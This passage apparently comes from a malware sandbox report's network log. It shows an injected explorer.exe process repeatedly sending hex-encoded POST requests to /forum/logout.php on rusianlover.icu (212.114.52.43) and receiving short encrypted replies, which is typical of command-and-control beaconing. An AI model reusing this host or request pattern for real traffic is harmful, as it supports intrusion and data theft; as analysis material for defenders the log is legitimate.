38 41 41 35 37 36 32 34 42 42 33 46 34 30 45 45 42 43 30 34 34 35 44 41 45 33 32 46 41 36 38 33 39 41 42 34 44 39 35 46 44 43 34 34 44 37 45 34 44 44 43 43 45 32 34 41 46 33 41 33 41 43 33 37 44 46 42 34 30 42 36 33 36 39 43 32 33 35 41 39 46 37 39 38 35 43 31 41 32 43 32 35 39 38 32 41 30 32 42 38 44 41 41 36 34 43 43 32 31 41 31
                                        Data Ascii: sqomkiay=726c941e245de966d8de&qmieaw=47363138&uuuu=266DD06CB7B69C85C124A313804281F5EE1F965F27BF7DFE198757CBC6CF8E43AFAA684C5ACF08D56471156F9808FF6930CB92C617E9030B16B1AAEC331703527331687D1BB51950D3D677725E2406324EF7B78FF4A527A87EBF9DFE5059FB35482D90015A259A168567C82E85BC2A670DF2EF9911E6AAE377001B3540A9F85E8067C1BEA12048E529EAAF5AFB4530B522E13D05EC9F2634A0D84081A94FBBB9D2A502AA7D0A542A227045CF59FE785F6049FEA8F4568108420C638C5B1DBEB34F51F3A715D5531B80EEE5E750F5A3270D2ED408B0149C0E2F7810C4900B5CE903E7BDC26A9503227AF33A8488AA57624BB3F40EEBC0445DAE32FA6839AB4D95FDC44D7E4DDCCE24AF3A3AC37DFB40B6369C235A9F7985C1A2C25982A02B8DAA64CC21A1
                                        Mar 10, 2021 11:42:57.148732901 CET5447INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:03 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 61 b2 48 10 16 fc dc 18 ee 94 cc eb c3 62 de ab f1 1d 25 1d 44 01 c3 54 23 34 5d 13 58 1b b2 f3 c9 f6 ea d4 56 bd f3 76 f9 0a 72 41 82 57 19 a6 42 88 63 31 ed 79 df 67 bb 5c 5a 6a ea ef 1e 58 be b4 2f ce 19 fe 46 19 02 12 bb a8 53 3f 4d 7f 97 f6 06 30 7d d0 40 75 52 22 cd d3 88 83 5e 11 a3 40 8f 5a 77 84 21 7b 2b 99 f1 52 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6daHb%DT#4]XVvrAWBc1yg\ZjX/FS?M0}@uR"^@Zw!{+R0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        12192.168.2.549741212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:42:59.927165985 CET10014OUTPOST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 649
                                        Cache-Control: no-cache
                                        Data Raw: 6f 63 71 65 73 67 75 69 3d 44 38 31 32 42 33 42 30 45 41 33 33 45 45 43 30 46 38 33 32 34 31 46 45 41 45 38 42 31 32 41 37 36 37 26 6d 79 6b 77 69 75 3d 35 35 33 32 30 31 31 36 26 71 67 77 6d 3d 34 44 31 42 43 33 36 35 36 35 39 38 30 42 32 43 34 41 31 45 38 42 35 46 43 30 36 44 45 43 32 41 46 38 41 38 38 33 37 36 43 30 41 43 31 39 38 34 34 43 44 38 41 43 37 33 38 37 34 43 44 41 32 34 31 44 35 34 34 33 34 38 33 37 33 35 44 31 46 37 34 30 33 31 30 32 35 45 41 39 30 44 38 37 33 37 46 35 38 35 41 31 35 30 43 35 34 34 46 42 31 43 33 38 35 36 30 36 43 42 45 34 32 43 46 43 46 32 39 38 33 39 32 46 38 44 42 43 37 30 43 37 37 31 38 36 35 36 45 36 41 41 32 44 45 34 41 44 30 46 41 30 33 45 31 30 31 35 36 32 34 43 37 31 46 33 41 32 44 34 39 30 43 32 36 42 43 39 39 46 39 31 42 32 43 39 32 37 43 43 33 38 39 46 30 39 35 43 44 35 34 38 37 33 34 36 38 42 39 42 37 45 41 33 30 36 44 39 39 36 36 39 37 30 43 30 37 32 41 38 35 45 39 32 41 34 38 33 36 43 33 30 39 41 42 45 43 45 41 38 38 44 44 45 41 46 37 30 37 46 38 41 33 38 34 43 33 44 36 30 45 31 35 37 43 35 31 39 34 38 32 35 38 30 37 37 33 41 32 38 37 31 34 33 39 32 38 42 32 35 31 44 39 46 34 39 35 34 35 36 44 39 32 31 30 46 36 30 39 32 37 42 36 45 46 43 34 38 36 45 33 42 37 38 31 46 41 41 42 33 32 34 46 42 45 41 46 31 46 32 33 31 46 30 33 37 43 33 34 33 31 46 41 36 36 36 39 44 45 46 31 46 42 31 41 32 41 30 36 46 35 36 37 38 44 41 36 44 44 36 41 31 42 31 41 34 36 33 43 37 37 38 43 44 38 46 44 33 34 30 42 43 44 37 33 41 39 43 35 32 44 41 36 37 34 35 44 30 35 31 38 35 45 38 34 38 33 46 30 36 41 41 36 32 44 36 41 37 30 45 43 31 45 39 30 41 43 33 44 35 31 45 41 32 31 44 44 41 31 46 30 41 33 33 31 45 44 41 36 39 33 38 38 42 39 38 44 31 31 45 42 37 41 37 44 43 44 30 30 37 42 37 35 34 36 42 45 45 34 39 45 45 41 35 33 34 39 38 44 45 31 45 45 34 39 32 36 46 41 35 43 43 38 43 46 37 39 44 31 30 39 44 38 42 39 36 33 33 34 38 35 37 32 45 42 30 30 43 32 30 37 42 33 34 42 44 38 37 34 42 37 35 36 37
                                        Data Ascii: ocqesgui=D812B3B0EA33EEC0F83241FEAE8B12A767&mykwiu=55320116&qgwm=4D1BC36565980B2C4A1E8B5FC06DEC2AF8A88376C0AC19844CD8AC73874CDA241D5443483735D1F74031025EA90D8737F585A150C544FB1C385606CBE42CFCF298392F8DBC70C7718656E6AA2DE4AD0FA03E1015624C71F3A2D490C26BC99F91B2C927CC389F095CD54873468B9B7EA306D9966970C072A85E92A4836C309ABECEA88DDEAF707F8A384C3D60E157C519482580773A287143928B251D9F495456D9210F60927B6EFC486E3B781FAAB324FBEAF1F231F037C3431FA6669DEF1FB1A2A06F5678DA6DD6A1B1A463C778CD8FD340BCD73A9C52DA6745D05185E8483F06AA62D6A70EC1E90AC3D51EA21DDA1F0A331EDA69388B98D11EB7A7DCD007B7546BEE49EEA53498DE1EE4926FA5CC8CF79D109D8B963348572EB00C207B34BD874B7567
                                        Mar 10, 2021 11:42:59.998224020 CET10015INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 74 33 65 42 28 36 bd 33 df 4e 99 46 35 94 3c d3 34 5f 80 a5 71 7e ef ba 21 08 14 e2 c4 66 fb be 8d 92 cd 17 4b eb 87 8b fe 44 c3 bc 0d dd 4e 31 6f 65 14 c5 f7 28 37 18 f3 31 f3 7f ce 51 e1 90 85 a6 34 ed d5 24 bc 9a 33 63 b5 55 d6 cc 40 8d 44 13 08 9e 67 b4 e6 b6 b4 ab ec 33 40 0f 26 53 5f 05 4c db 87 45 5b 5f 32 4f e4 14 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dt3eB(63NF5<4_q~!fKDN1oe(71Q4$3cU@Dg3@&S_LE[_2O0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        13192.168.2.549742212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:43:02.820017099 CET10093OUTPOST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 671
                                        Cache-Control: no-cache
                                        Data Raw: 73 6b 69 61 3d 32 34 44 46 46 32 37 35 37 46 43 35 45 32 34 38 32 43 36 32 42 36 36 45 39 46 32 44 33 45 44 36 37 30 34 43 38 39 31 45 32 30 33 46 45 41 37 44 46 46 42 30 42 38 36 32 26 71 67 63 73 69 65 75 71 3d 31 39 33 33 34 33 35 36 26 75 6f 6f 69 63 63 3d 33 45 36 37 38 39 37 46 42 31 45 39 43 45 32 31 34 41 41 36 37 32 41 32 31 42 35 38 35 41 34 42 39 32 34 37 33 37 34 31 37 34 46 44 34 38 45 32 32 34 44 45 31 33 30 38 37 44 41 33 44 44 32 45 45 39 35 43 41 41 35 42 44 31 37 30 43 39 32 31 39 37 42 32 30 31 41 38 34 43 41 36 44 36 31 42 45 45 31 36 45 38 43 46 33 44 39 42 33 34 46 35 35 45 34 43 37 34 38 43 45 42 41 43 37 39 34 34 34 38 43 46 45 44 39 33 43 39 35 30 42 32 36 34 32 39 46 36 39 43 41 38 39 36 46 44 36 35 35 42 38 37 30 44 32 37 42 38 32 35 34 38 41 32 46 44 34 44 37 44 44 32 32 33 35 34 39 32 37 36 37 36 42 45 43 32 41 30 36 30 37 39 46 32 38 42 44 33 32 45 32 39 44 33 34 44 35 31 32 34 43 37 46 34 42 38 37 38 45 32 45 32 35 35 35 33 38 41 38 32 45 45 33 39 39 41 32 44 46 44 38 31 36 46 46 39 42 38 35 31 31 43 35 30 34 45 36 46 39 30 34 33 33 45 31 36 38 41 34 43 36 34 42 31 32 45 44 45 44 45 31 32 32 31 41 46 39 34 41 42 35 41 43 43 36 41 30 45 32 33 32 36 43 34 31 37 37 32 39 43 37 34 38 39 32 36 32 39 35 41 41 43 45 41 34 46 46 34 43 32 46 38 39 36 43 30 39 32 38 45 43 42 38 41 44 45 41 43 34 30 39 34 46 37 45 43 43 43 31 38 35 45 37 36 38 37 39 31 37 38 45 46 45 42 37 34 35 37 45 41 45 36 34 44 41 45 37 33 33 32 33 38 33 41 44 43 34 32 34 33 34 42 32 39 46 44 35 41 32 30 37 39 41 31 33 35 38 34 34 37 35 31 43 36 31 38 36 46 43 34 45 33 37 37 34 45 34 46 34 36 44 38 46 44 41 43 41 34 33 37 41 39 33 42 43 32 36 45 44 32 45 43 37 30 44 30 39 43 45 34 36 31 45 41 38 46 45 39 45 35 42 39 34 38 43 33 32 43 30 31 43 32 41 41 43 34 37 44 46 43 43 43 31 41 33 31 45 39 44 31 34 35 39 31 38 44 46 30 39 39 46 46 41 31 46 32 44 41 42 44 35 35 31 33 38 33 31 45 38 33 38 32 41 44 36 44 39 43 42 31 36 32 32 39 37 30 31 35 42 46 36 35 44 31 41 36 35 30 32 44 30 34 32 43
                                        Data Ascii: skia=24DFF2757FC5E2482C62B66E9F2D3ED6704C891E203FEA7DFFB0B862&qgcsieuq=19334356&uooicc=3E67897FB1E9CE214AA672A21B585A4B9247374174FD48E224DE13087DA3DD2EE95CAA5BD170C92197B201A84CA6D61BEE16E8CF3D9B34F55E4C748CEBAC794448CFED93C950B26429F69CA896FD655B870D27B82548A2FD4D7DD22354927676BEC2A06079F28BD32E29D34D5124C7F4B878E2E255538A82EE399A2DFD816FF9B8511C504E6F90433E168A4C64B12EDEDE1221AF94AB5ACC6A0E2326C417729C748926295AACEA4FF4C2F896C0928ECB8ADEAC4094F7ECCC185E76879178EFEB7457EAE64DAE7332383ADC42434B29FD5A2079A135844751C6186FC4E3774E4F46D8FDACA437A93BC26ED2EC70D09CE461EA8FE9E5B948C32C01C2AAC47DFCCC1A31E9D145918DF099FFA1F2DABD5513831E8382AD6D9CB162297015BF65D1A6502D042C
                                        Mar 10, 2021 11:43:02.893014908 CET10094INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:09 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 74 33 65 42 28 36 bd 33 df 4e 99 46 35 94 3c d3 34 5f 80 a5 71 7e ef ba 21 08 14 e2 c4 66 fb be 8d 92 cd 17 4b eb 87 8b fe 44 c3 bc 0d dd 4e 31 6f 65 14 c5 f7 28 37 18 f3 31 f3 7f ce 51 e1 90 85 a6 34 ed d5 24 bc 9a 33 63 b5 55 d6 cc 40 8d 44 13 08 9e 67 b4 e6 b6 b4 ab ec 33 40 0f 26 53 5f 05 4c db 87 45 5b 5f 32 4f e4 14 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dt3eB(63NF5<4_q~!fKDN1oe(71Q4$3cU@Dg3@&S_LE[_2O0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        14192.168.2.549743212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:43:05.646526098 CET10095OUTPOST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 672
                                        Cache-Control: no-cache
                                        Data Raw: 7a 65 6a 69 6e 3d 37 46 43 31 41 31 39 33 36 39 36 35 31 42 38 41 44 37 41 42 33 31 37 33 34 31 32 31 30 38 44 46 42 45 34 43 30 42 33 36 31 46 34 37 34 44 37 45 37 43 35 45 36 44 26 78 61 64 61 64 67 6a 67 6a 3d 37 39 36 34 32 34 36 39 26 62 69 70 71 78 65 6c 3d 42 38 41 38 37 39 39 39 42 46 37 44 41 43 45 43 45 36 46 39 46 34 45 36 34 44 46 42 32 34 33 35 46 34 38 37 42 43 44 32 33 34 42 30 46 30 33 46 30 30 32 36 36 31 31 33 41 31 43 32 41 34 46 41 37 36 36 38 37 45 36 33 41 42 32 44 38 30 38 45 41 30 34 43 42 38 44 42 37 30 38 45 30 42 38 42 42 33 33 31 32 38 41 37 34 33 43 38 32 34 43 41 42 39 35 34 42 37 34 36 41 35 45 42 42 39 38 44 35 43 36 36 35 41 34 35 36 46 34 33 45 34 43 43 30 39 32 33 39 34 33 36 46 32 31 42 42 37 37 37 45 33 42 42 33 39 37 43 38 42 33 41 46 34 32 35 39 43 46 35 34 43 32 33 32 43 33 43 43 36 45 39 35 45 32 36 38 46 43 46 37 30 38 44 32 34 36 34 43 37 33 34 34 30 35 33 42 39 45 46 46 42 38 34 33 41 44 34 43 38 39 44 32 41 41 34 34 38 39 30 46 32 30 41 31 32 46 35 37 46 38 30 36 36 41 43 31 41 43 45 38 38 35 44 41 39 41 41 35 38 38 33 31 36 30 31 37 30 31 43 35 38 36 35 43 30 30 30 46 34 36 44 42 45 31 39 33 33 46 38 36 44 34 34 37 36 42 33 39 36 44 43 43 34 41 37 32 43 36 35 30 44 32 44 32 36 36 39 33 46 41 33 31 32 45 38 33 44 30 30 34 44 39 34 44 36 38 42 38 32 37 31 41 38 33 45 41 32 42 39 35 37 45 34 45 38 38 31 39 32 46 30 41 39 44 37 33 34 34 34 30 31 30 46 43 37 38 36 31 44 31 42 44 42 38 39 36 36 32 31 41 35 41 42 42 41 45 38 30 32 36 34 35 44 37 32 44 35 32 41 36 42 46 39 41 37 38 43 33 37 37 42 32 38 37 35 45 31 45 37 31 34 33 32 43 45 36 45 37 39 46 42 46 43 42 35 39 33 44 32 33 44 46 31 36 30 37 35 41 38 46 43 41 45 41 38 34 36 42 35 41 33 45 41 39 38 35 44 32 43 32 46 37 41 34 45 42 37 45 35 36 35 41 33 41 46 45 46 45 46 30 36 35 36 37 32 30 35 41 31 41 39 39 42 30 31 43 30 43 42 43 43 30 46 44 43 37 43 38 36 46 46 46 32 39 37 37 45 39 37 30 45 46 43 31 42 34 33 41 30 32 32 45 37 46 45 41 45 41 31 30 31 44 42 43 30 41 33 39 45 39 41 35 43
                                        Data Ascii: zejin=7FC1A19369651B8AD7AB3173412108DFBE4C0B361F474D7E7C5E6D&xadadgjgj=79642469&bipqxel=B8A87999BF7DACECE6F9F4E64DFB2435F487BCD234B0F03F00266113A1C2A4FA76687E63AB2D808EA04CB8DB708E0B8BB33128A743C824CAB954B746A5EBB98D5C665A456F43E4CC09239436F21BB777E3BB397C8B3AF4259CF54C232C3CC6E95E268FCF708D2464C7344053B9EFFB843AD4C89D2AA44890F20A12F57F8066AC1ACE885DA9AA58831601701C5865C000F46DBE1933F86D4476B396DCC4A72C650D2D26693FA312E83D004D94D68B8271A83EA2B957E4E88192F0A9D73444010FC7861D1BDB896621A5ABBAE802645D72D52A6BF9A78C377B2875E1E71432CE6E79FBFCB593D23DF16075A8FCAEA846B5A3EA985D2C2F7A4EB7E565A3AFEFEF06567205A1A99B01C0CBCC0FDC7C86FFF2977E970EFC1B43A022E7FEAEA101DBC0A39E9A5C
                                        Mar 10, 2021 11:43:05.717017889 CET10096INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:12 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 6f 04 f6 0d ff 25 09 4c b5 a1 06 02 35 83 f3 0c bc af d0 3b 6a 20 13 d0 cc 42 50 cf f2 d8 54 74 9e 02 e8 9e b8 c2 80 85 f3 61 99 6f 2f 02 ed fa a6 14 5d 8e ec 46 01 cf d0 e8 14 fb fd d9 8b 61 48 a7 df 7e fe b8 a3 cc 44 5e d9 a0 40 70 90 ac c0 08 4d a8 75 00 d3 d4 97 10 93 41 96 af 16 c9 59 57 fa 73 fe 84 65 bc 5a 88 79 59 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6do%L5;j BPTtao/]FaH~D^@pMuAYWseZyY0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        15192.168.2.549744212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:43:08.461410999 CET10097OUTPOST /forum/logout.php?id=1106076 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 637
                                        Cache-Control: no-cache
                                        Data Raw: 73 71 6f 6d 6b 69 3d 38 65 30 62 38 33 64 33 35 62 64 38 32 35 61 65 32 66 37 34 37 33 26 71 6d 69 65 3d 37 38 31 33 37 37 33 36 26 75 75 75 75 75 75 75 75 3d 37 63 66 65 66 38 62 64 62 34 38 66 63 37 32 32 61 34 61 30 65 31 38 33 30 62 36 64 38 34 63 62 66 31 36 61 62 37 66 63 66 37 36 61 61 64 38 37 35 39 61 30 61 38 61 31 32 34 30 37 35 32 38 37 66 34 62 36 32 38 33 35 62 31 62 30 64 66 33 61 63 64 65 34 66 33 63 65 38 30 38 66 65 36 34 30 38 39 64 33 36 34 32 62 38 39 65 66 63 32 38 37 30 61 37 33 61 38 30 31 63 31 37 64 36 30 32 37 61 65 35 65 33 31 30 63 64 63 33 39 64 64 61 62 35 65 62 32 62 38 64 62 34 65 31 65 30 37 32 64 39 33 38 66 36 30 35 64 66 31 32 65 61 65 38 38 30 36 37 63 62 37 34 30 62 30 32 61 66 31 64 39 61 64 65 38 34 62 36 35 34 66 64 38 63 34 35 33 64 35 38 61 37 37 39 32 38 64 31 30 63 63 37 39 36 36 64 37 66 31 36 33 31 37 36 32 65 66 65 36 63 31 64 35 66 66 35 32 37 63 31 31 65 63 37 30 65 36 33 65 39 37 38 30 37 39 66 37 66 30 30 36 37 35 66 36 38 38 61 66 65 62 65 61 64 30 39 66 31 30 37 65 66 39 32 32 34 61 65 30 37 33 38 66 35 37 37 66 64 63 31 37 33 65 37 64 32 33 37 61 65 39 37 32 65 65 38 31 66 62 39 39 33 30 65 64 35 65 62 33 66 33 63 33 65 66 65 65 65 38 34 34 62 33 66 39 38 65 61 65 66 39 35 37 39 62 35 62 33 64 35 39 37 64 33 37 66 37 31 38 32 64 38 62 32 32 66 32 31 36 30 38 34 37 37 34 65 39 35 34 62 34 37 34 31 32 62 38 33 34 61 34 64 30 62 31 63 35 34 38 32 62 30 66 39 38 38 36 65 30 31 39 30 36 30 33 32 30 38 39 63 63 61 62 39 31 65 63 35 62 33 66 31 38 66 37 63 38 65 34 63 37 32 35 64 33 65 31 62 33 38 63 32 39 63 39 66 63 33 35 66 39 35 65 65 63 36 32 35 64 62 39 38 30 65 61 35 31 63 64 37 64 64 38 39 34 33 30 37 61 62 63 32 34 62 32 66 30 32 62 39 36 63 65 39 36 66 36 37 64 61 62 31 61 39 61 37 61 65 36 35 31 32 33 64 63 33 66 31 32 66 32 38 35 30 30 61 36 30 38 62 62 30 35 63 38 38 30 35 38 30 37 37 36 36 66 63 30 63 39 37 35 38 30
                                        Data Ascii: sqomki=8e0b83d35bd825ae2f7473&qmie=78137736&uuuuuuuu=7cfef8bdb48fc722a4a0e1830b6d84cbf16ab7fcf76aad8759a0a8a124075287f4b62835b1b0df3acde4f3ce808fe64089d3642b89efc2870a73a801c17d6027ae5e310cdc39ddab5eb2b8db4e1e072d938f605df12eae88067cb740b02af1d9ade84b654fd8c453d58a77928d10cc7966d7f1631762efe6c1d5ff527c11ec70e63e978079f7f00675f688afebead09f107ef9224ae0738f577fdc173e7d237ae972ee81fb9930ed5eb3f3c3efeee844b3f98eaef9579b5b3d597d37f7182d8b22f216084774e954b47412b834a4d0b1c5482b0f9886e01906032089ccab91ec5b3f18f7c8e4c725d3e1b38c29c9fc35f95eec625db980ea51cd7dd894307abc24b2f02b96ce96f67dab1a9a7ae65123dc3f12f28500a608bb05c8805807766fc0c97580
                                        Mar 10, 2021 11:43:08.529418945 CET10098INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:14 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 78 6a 53 41 a5 e4 58 2b e4 4a 2d 10 34 3a 6d e9 1c bb 7c 26 15 ee 78 82 9b a7 f4 3e f8 2f b9 f1 f4 b4 cf 6e 27 1e b9 8c 41 47 76 01 c4 39 21 64 46 e8 dc b8 85 ba 86 31 af 54 39 1f 9c b6 7c 37 d6 26 5e 88 26 b7 95 bc 4a 81 a9 79 0c 41 73 36 57 b2 53 02 f3 ed a5 e2 39 42 8e 04 9c 85 ea 2e e2 0d 0b e7 60 cc 31 c7 f2 fa d6 f3 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dxjSAX+J-4:m|&x>/n'AGv9!dF1T9|7&^&JyAs6WS9B.`10


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        16192.168.2.549745212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:43:11.286036968 CET10099OUTPOST /forum/logout.php?id=3125771 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 665
                                        Cache-Control: no-cache
                                        Data Raw: 77 73 6f 6b 6d 69 3d 33 38 34 31 31 32 46 42 38 43 45 30 39 35 42 34 45 46 37 34 44 46 35 33 32 43 37 46 45 35 34 41 44 42 30 30 33 38 34 31 42 38 37 38 34 42 44 35 41 34 26 75 6f 69 63 3d 39 34 35 34 33 34 37 36 26 79 77 75 73 77 75 73 71 3d 34 37 44 39 45 31 39 44 31 39 42 43 30 37 45 33 42 43 41 30 42 41 37 31 39 42 31 42 45 30 46 32 31 45 43 36 33 33 31 30 34 30 46 39 38 46 43 46 32 34 30 42 33 34 46 46 38 30 36 44 34 43 37 39 36 31 31 35 33 34 45 43 41 36 41 35 39 44 46 33 39 34 33 39 46 41 46 38 45 42 31 33 34 41 32 33 37 32 42 42 37 43 30 33 30 32 41 37 38 33 32 42 37 42 42 43 45 32 38 42 35 36 39 37 38 30 39 44 30 37 31 35 35 33 44 31 35 36 45 39 36 44 42 42 45 32 38 46 39 35 42 30 30 45 35 41 41 43 30 32 43 39 38 35 41 30 35 33 34 33 41 34 44 35 36 33 36 43 32 35 37 35 38 43 42 31 38 38 36 34 43 35 38 44 38 33 42 43 33 46 34 33 45 38 33 39 32 38 32 41 38 42 45 46 45 37 46 37 36 31 46 34 41 37 36 43 38 42 42 33 36 42 35 30 37 34 36 46 31 39 31 30 36 37 39 39 46 30 30 32 30 36 46 38 31 33 36 36 32 33 36 37 33 43 31 45 44 38 43 43 41 45 35 45 39 37 34 39 39 32 33 31 46 30 31 37 45 45 44 36 45 34 34 43 43 36 31 34 44 34 42 43 35 34 32 43 39 32 45 37 35 32 41 31 32 44 43 46 32 35 36 41 42 38 30 39 31 32 44 39 32 38 42 37 43 42 41 36 31 32 31 39 38 31 38 41 30 46 34 31 35 39 42 32 44 44 32 34 42 43 46 39 41 39 36 37 43 44 39 45 36 37 36 45 43 39 46 31 34 46 41 46 38 32 35 46 31 45 45 37 42 45 39 46 36 46 44 45 44 32 38 43 37 35 34 31 30 31 34 34 32 32 37 32 37 31 46 30 31 31 35 33 43 41 30 44 45 31 31 43 39 32 46 45 46 33 34 35 46 42 42 41 37 44 35 46 46 39 35 34 43 33 45 45 34 38 33 33 43 34 42 30 45 45 36 38 39 32 45 38 41 33 32 43 46 31 39 44 38 31 36 45 30 36 34 45 44 30 46 43 36 42 36 36 39 32 45 45 35 37 46 33 43 35 45 30 32 36 43 31 34 43 34 42 45 37 32 31 46 43 37 37 41 32 39 39 35 42 42 33 31 39 34 39 35 31 33 45 37 42 41 36 43 34 31 34 35 34 30 43 37 32 41 31 43 30 38 34 41 39 33 31 39 35 31 42 33 39 45 46 38 33 30 42 35 31 37 35 38 46 42 30 41 33
                                        Data Ascii: wsokmi=384112FB8CE095B4EF74DF532C7FE54ADB003841B8784BD5A4&uoic=94543476&ywuswusq=47D9E19D19BC07E3BCA0BA719B1BE0F21EC6331040F98FCF240B34FF806D4C79611534ECA6A59DF39439FAF8EB134A2372BB7C0302A7832B7BBCE28B5697809D071553D156E96DBBE28F95B00E5AAC02C985A05343A4D5636C25758CB18864C58D83BC3F43E839282A8BEFE7F761F4A76C8BB36B50746F19106799F00206F8136623673C1ED8CCAE5E97499231F017EED6E44CC614D4BC542C92E752A12DCF256AB80912D928B7CBA61219818A0F4159B2DD24BCF9A967CD9E676EC9F14FAF825F1EE7BE9F6FDED28C75410144227271F01153CA0DE11C92FEF345FBBA7D5FF954C3EE4833C4B0EE6892E8A32CF19D816E064ED0FC6B6692EE57F3C5E026C14C4BE721FC77A2995BB31949513E7BA6C414540C72A1C084A931951B39EF830B51758FB0A3
                                        Mar 10, 2021 11:43:11.355935097 CET10100INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a b8 d4 1c 57 12 c0 42 45 e6 ae 86 21 e0 eb 9c 7e 2c 98 64 db 77 df 52 b4 ce 61 29 71 dc eb 70 3c 4f ba 33 f9 34 82 0c a9 e8 40 87 90 46 3d c8 6b d9 39 0e 52 01 c8 8e 80 3a af c3 3d 44 3a de 11 13 0f 30 b9 6a be 8f 7a 5e 83 8b de 02 57 c2 f5 28 c2 bf 0c 15 c4 99 be de 31 84 21 1a 03 f8 1d 2b 7a fb ec b9 4c 79 dc a0 fb 91 c6 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dWBE!~,dwRa)qp<O34@F=k9R:=D:0jz^W(1!+zLy0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        17192.168.2.549747212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:43:14.102725983 CET10111OUTPOST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 653
                                        Cache-Control: no-cache
                                        Data Raw: 6b 75 6b 75 3d 66 62 62 64 62 66 30 36 33 35 66 39 31 37 30 36 63 30 34 63 39 33 39 30 39 38 32 66 33 64 37 35 63 33 64 64 64 66 26 69 71 65 6d 61 69 77 65 3d 32 33 38 30 34 38 34 32 26 6d 79 71 63 75 67 3d 44 42 39 43 37 33 36 30 33 37 45 37 35 44 35 45 43 41 39 41 33 37 42 42 45 45 34 42 39 39 44 46 30 46 42 38 44 42 31 32 38 34 45 30 45 44 32 34 36 39 32 41 42 41 39 30 33 46 31 31 44 31 45 39 31 32 39 33 36 33 35 37 44 30 30 36 38 45 31 38 36 41 44 37 39 35 39 46 35 30 31 34 31 33 43 30 42 36 36 42 45 32 45 39 35 37 35 35 43 37 31 44 42 45 35 34 41 32 43 33 41 30 38 33 32 36 42 37 33 34 38 33 38 37 33 44 34 36 43 38 41 38 30 38 42 41 36 39 30 33 33 43 35 42 30 38 34 32 44 44 33 35 38 31 38 46 33 36 46 33 43 32 33 35 43 42 34 32 44 34 31 36 41 43 35 34 35 44 46 31 45 34 34 43 34 31 42 31 38 32 43 44 31 44 33 35 30 35 36 32 37 43 35 46 35 45 32 37 37 42 33 37 38 42 39 38 41 37 46 30 33 39 33 30 44 34 39 37 46 33 38 41 45 43 31 30 46 38 36 33 44 39 34 39 34 46 43 42 39 31 44 37 34 33 35 44 44 39 44 37 44 42 46 33 30 34 44 35 37 31 